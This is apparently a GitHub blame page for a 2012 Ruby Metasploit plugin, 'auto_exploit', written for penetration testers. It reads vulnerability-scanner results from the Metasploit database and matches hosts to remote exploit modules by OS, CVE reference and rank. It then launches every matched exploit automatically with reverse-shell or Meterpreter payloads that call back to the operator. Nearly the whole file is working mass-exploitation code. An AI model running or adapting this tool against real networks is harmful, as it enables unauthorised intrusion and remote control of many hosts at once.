Skip to content
This repository
Newer
Older
100644 283 lines (255 sloc) 8.356 kb
28d457b1 »
2012-01-18 fixes and new commands
1 # Copyright (c) 2012, Carlos Perez <carlos_perez[at]darkoperator.com
2 # All rights reserved.
3 #
4 # Redistribution and use in source and binary forms, with or without modification, are permitted
5 # provided that the following conditions are met:
6 #
7 # Redistributions of source code must retain the above copyright notice, this list of conditions and
8 # the following disclaimer.
9 #
10 # Redistributions in binary form must reproduce the above copyright notice, this list of conditions
11 # and the following disclaimer in the documentation and/or other materials provided with the
12 # distribution.
13 #
14 # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
15 # IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
16 # FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
17 # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
18 # DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
19 # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER
20 # IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT
21 # OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
22 module Msf
23
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
24 class Plugin::AutoExploit < Msf::Plugin
ac83e1b4 »
2012-01-19 fix whitespaces
25
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
26 class AutoExploit
1678f6bb »
2012-01-18 whitespace cleanup
27 include Msf::Ui::Console::CommandDispatcher
ac83e1b4 »
2012-01-19 fix whitespaces
28
1678f6bb »
2012-01-18 whitespace cleanup
29 # Set name for command dispatcher
30 def name
31 "auto_exploit"
32 end
ac83e1b4 »
2012-01-19 fix whitespaces
33
1678f6bb »
2012-01-18 whitespace cleanup
34 # Define Commands
35 def commands
36 {
37 "vuln_exploit" => "Runs exploits based on data imported from vuln scanners."
38 }
39 end
ac83e1b4 »
2012-01-19 fix whitespaces
40
1678f6bb »
2012-01-18 whitespace cleanup
41 # Multi shell command
42 def cmd_vuln_exploit(*args)
43 require 'timeout'
44
45 # Define options
46 opts = Rex::Parser::Arguments.new(
47 "-f" => [ true, "Provide a comma separated list of IP's and Ranges to skip when running exploits."],
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
48 "-r" => [ true, "Minimun Rank for exploits (low, average,normal,good,great and excelent) good is the default."],
1678f6bb »
2012-01-18 whitespace cleanup
49 "-s" => [ false, "Do not limit number of sessions to one per target."],
50 "-h" => [ false, "Command Help"]
51 )
ac83e1b4 »
2012-01-19 fix whitespaces
52
1678f6bb »
2012-01-18 whitespace cleanup
53 # set variables for options
54 os_type = ""
55 filter = []
56 range = []
57 limit_sessions = true
58 matched_exploits = []
ac83e1b4 »
2012-01-19 fix whitespaces
59 min_rank = 100
60 ranks ={
61 "low" => 100,
62 "average" => 200,
63 "normal" => 300 ,
64 "good"=>400,
65 "great"=>500,
66 "excelent" => 600
67 }
1678f6bb »
2012-01-18 whitespace cleanup
68 # Parse options
69 opts.parse(args) do |opt, idx, val|
70 case opt
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
71 when "-f"
72 range = val.gsub(" ","").split(",")
73
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
74 when "-r"
75 if ranks.include?(val)
ac83e1b4 »
2012-01-19 fix whitespaces
76 min_rank = ranks[val]
77 else
78 print_error("Value of #{val} not in list using default of good.")
79 end
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
80
1678f6bb »
2012-01-18 whitespace cleanup
81 when "-s"
82 limit_sessions = false
28d457b1 »
2012-01-18 fixes and new commands
83
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
84 when "-h"
85 print_line(opts.usage)
86 return
1678f6bb »
2012-01-18 whitespace cleanup
87 end
88 end
89
90 # generate a list of IP's to not exploit
91 range.each do |r|
92 Rex::Socket::RangeWalker.new(r).each do |i|
93 filter << i
94 end
95 end
96
97 print_status("Matching Exploits (This will take a while depending on number of hosts)...")
28d457b1 »
2012-01-18 fixes and new commands
98 framework.db.workspace.hosts.each do |h|
1678f6bb »
2012-01-18 whitespace cleanup
99 # Check that host has vulnerabilities associated in the DB
100 if h.vulns.length > 0
101 os_type = normalise_os(h.os_name)
102 #payload = chose_pay(h.os_name)
103 framework.exploits.each_module do |x,e|
104 found = false
105 x = e.new
106 # lets filter for those exploits that are actually remote and match the OS
107 if x.fullname =~ /#{os_type}/ and x.datastore.include?('RPORT')
ac83e1b4 »
2012-01-19 fix whitespaces
108 next if not x.rank >= min_rank
1678f6bb »
2012-01-18 whitespace cleanup
109 # lets get the proper references
110 e_refs = parse_references(x.references)
111 h.vulns.each do |v|
112 v.refs.each do |f|
113 if e_refs.include?(f.name) and not found
114
115 # Skip those hosts that are filtered
116 next if filter.include?(h.address)
117
118 # Save exploits in manner easy to retreave later
119 exploit = {
120 :exploit => x.fullname,
121 :port => v.service.port,
122 :target => h.address
123 }
124 matched_exploits << exploit
125 found = true
126 end
127 end
128 end
129 end
130 end
131 end
132 end
133
134 if matched_exploits.length > 0
135 print_good("Matched Exploits:")
136 matched_exploits.each do |e|
137 print_good("\t#{e[:target]} #{e[:exploit]} #{e[:port]}")
138 end
139 else
140 print_error("No Exploits where Matched.")
141 return
142 end
143 port_list = (1024..65000).to_a.shuffle.first
144 print_status("Running Exploits:")
145 matched_exploits.each do |e|
146 if limit_sessions and get_current_sessions.include?(e[:target])
147 print_good("\tSkipping #{e[:target]} #{e[:exploit]} because a session already exists.")
148 next
149 end
150 begin
151 ex = framework.modules.create(e[:exploit])
152 ex = chose_pay(ex, e[:target])
153 ex.datastore['RHOST'] = e[:target]
154 ex.datastore['RPORT'] = e[:port].to_i
ac83e1b4 »
2012-01-19 fix whitespaces
155 ex.datastore['LPORT'] = port_list
1678f6bb »
2012-01-18 whitespace cleanup
156 ex.datastore['VERBOSE'] = true
157 (ex.options.validate(ex.datastore))
158 print_status("Running #{e[:exploit]} against #{e[:target]}")
159 Timeout::timeout(20) do
160 ex.exploit_simple(
161 'Payload' => ex.datastore['PAYLOAD'],
162 'LocalInput' => driver.input,
163 'LocalOutput' => driver.output,
164 'RunAsJob' => true
165 )
166 end
167 rescue Timeout::Error
168 print_error("Exploit #{e[:exploit]} against #{e[:target]} timed out")
169 end
170 end
28d457b1 »
2012-01-18 fixes and new commands
171
1678f6bb »
2012-01-18 whitespace cleanup
172 end
173
174 # Normalize the OS name since different scanner may have entered different values.
175 def normalise_os(os_name)
176 case os_name
177 when /(Microsoft|Windows)/i
178 os = "windows"
179 when /(Linux|Ubuntu|CentOS|RedHat)/i
180 os = "linux"
181 when /aix/i
182 os = "aix"
183 when /(freebsd)/i
184 os = "freebsd"
185 when /(hpux|hp-ux)/i
186 os = "hpux"
187 when /solaris/i
188 os = solaris
189 when /(Apple|OSX|OS X)/i
190 os = "osx"
191 end
192 return os
193 end
ac83e1b4 »
2012-01-19 fix whitespaces
194
1678f6bb »
2012-01-18 whitespace cleanup
195 # Parse the exploit references and get a list of CVE, BID and OSVDB values that
196 # we can match accurately.
197 def parse_references(refs)
198 references = []
199 refs.each do |r|
200 # We do not want references that are URLs
201 next if r.ctx_id == "URL"
202 # Format the reference as it is saved by Nessus
203 references << "#{r.ctx_id}-#{r.ctx_val}"
204 end
205 return references
206 end
207
208 # Choose the proper payload
209 def chose_pay(mod, rhost)
210 # taken from the exploit ui mixin
211 # A list of preferred payloads in the best-first order
212 pref = [
213 'windows/meterpreter/reverse_tcp',
214 'java/meterpreter/reverse_tcp',
215 'php/meterpreter/reverse_tcp',
216 'php/meterpreter_reverse_tcp',
217 'cmd/unix/interact',
218 'cmd/unix/reverse',
219 'cmd/unix/reverse_perl',
220 'cmd/unix/reverse_netcat',
221 'windows/meterpreter/reverse_nonx_tcp',
222 'windows/meterpreter/reverse_ord_tcp',
223 'windows/shell/reverse_tcp',
224 'generic/shell_reverse_tcp'
225 ]
226 pset = mod.compatible_payloads.map{|x| x[0] }
227 pref.each do |n|
228 if(pset.include?(n))
229 mod.datastore['PAYLOAD'] = n
230 mod.datastore['LHOST'] = Rex::Socket.source_address(rhost)
231 return mod
232 end
233 end
234 end
235 # Create a payload given a name, lhost and lport, additional options
236 def create_payload(name, lhost, lport, opts = "")
237 puts name
238 pay = framework.payloads.create(name)
239 pay.datastore['LHOST'] = lhost
240 pay.datastore['LPORT'] = lport
241 if not opts.empty?
242 opts.split(",").each do |o|
243 opt,val = o.split("=", 2)
244 pay.datastore[opt] = val
245 end
246 end
247 # Validate the options for the module
248 if pay.options.validate(pay.datastore)
28d457b1 »
2012-01-18 fixes and new commands
249 print_good("Payload option validation passed")
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
250 end
1678f6bb »
2012-01-18 whitespace cleanup
251 return pay
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
252
1678f6bb »
2012-01-18 whitespace cleanup
253 end
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
254
1678f6bb »
2012-01-18 whitespace cleanup
255 def get_current_sessions()
256 session_hosts = framework.sessions.map { |s,r| r.tunnel_peer.split(":")[0] }
257 return session_hosts
258 end
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
259
ac83e1b4 »
2012-01-19 fix whitespaces
260 end
261
262
263 def initialize(framework, opts)
264 super
265 add_console_dispatcher(AutoExploit)
266 print_status("auto_exploit plugin loaded.")
267 end
268
269 def cleanup
270 remove_console_dispatcher("auto_exploit")
271 end
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
272
ac83e1b4 »
2012-01-19 fix whitespaces
273 def name
274 "auto_exploit"
275 end
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
276
ac83e1b4 »
2012-01-19 fix whitespaces
277 def desc
278 "Allows for automation of running exploit modules based on information in the Database."
279 end
a31e2dc6 »
2012-01-18 initial work on a exploit automation plugin
280
ac83e1b4 »
2012-01-19 fix whitespaces
281 protected
282 end
915d243d »
2012-01-18 fixed a misplaced end and added filtering by exploit rank
283 end
Something went wrong with that request. Please try again.